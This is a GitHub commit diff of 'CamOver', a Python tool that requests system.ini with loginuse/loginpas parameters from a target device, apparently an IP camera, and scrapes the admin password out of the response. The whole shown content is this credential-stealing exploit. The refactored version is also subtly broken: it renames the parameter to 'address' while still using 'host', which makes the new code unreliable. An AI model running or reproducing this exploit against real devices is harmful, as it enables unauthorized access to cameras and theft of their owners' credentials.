| skipped 29 lines |
| 30 | 30 | | |
| 31 | 31 | | class CamOver: |
| 32 | 32 | | @staticmethod |
| 33 | | - | def connect(host): |
| | 33 | + | def exploit(address): |
| 34 | 34 | | try: |
| 35 | | - | response = requests.get(f"http://{host}/system.ini?loginuse&loginpas", verify=False, timeout=3) |
| | 35 | + | response = requests.get( |
| | 36 | + | f"http://{host}/system.ini?loginuse&loginpas", |
| | 37 | + | verify=False, |
| | 38 | + | timeout=3 |
| | 39 | + | ) |
| 36 | 40 | | except Exception: |
| 37 | 41 | | return None |
| 38 | | - | return response |
| 39 | 42 | | |
| 40 | | - | @staticmethod |
| 41 | | - | def exploit(response): |
| 42 | 43 | | if response.status_code == 200: |
| 43 | 44 | | strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", response.text) |
| 44 | 45 | | if 'admin' in strings: |
| 45 | 46 | | username_index = strings.index('admin') |
| 46 | 47 | | password = strings[username_index + 1] |
| 47 | | - | return password |
| 48 | | - | return None |
| | 48 | + | return 'admin', password |
| 49 | 49 | | |
Ivan Nikolsky
committed
with
GitHub
3 years ago
1 parent 84ceed7f